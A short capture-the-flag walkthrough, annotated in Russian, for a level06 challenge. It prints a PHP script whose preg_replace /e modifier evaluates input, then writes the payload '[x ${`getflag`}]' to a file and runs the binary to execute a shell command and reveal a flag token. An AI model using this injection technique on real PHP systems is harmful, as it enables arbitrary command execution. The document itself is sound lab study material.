1) ls
level06  level06.php
2) ./level06
PHP Warning:  file_get_contents(): Filename cannot be empty in /home/user/level06/level06.php on line 4

Видим, что в процессе выполнения вызывется файл /home/user/level06/level06.php

3) cat /home/user/level06/level06.php

#!/usr/bin/php
<?php
function y($m) { $m = preg_replace("/\./", " x ", $m); $m = preg_replace("/@/", " y", $m); return $m; }
function x($y, $z) { $a = file_get_contents($y); $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); $a = preg_replace("/\[/", "(", $a); $a = preg_replace("/\]/", ")", $a); return $a; }
$r = x($argv[1], $argv[2]); print $r;
?>

4) После изучения, понимаем, что файл должен содержать следующее
[x ${`getflag`}]


5) echo '[x ${`getflag`}]' > /tmp/phpexploit

6) ./level06 /tmp/phpexploit

PHP Notice:  Undefined variable: Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub
 in /home/user/level06/level06.php(4) : regexp code on line 1


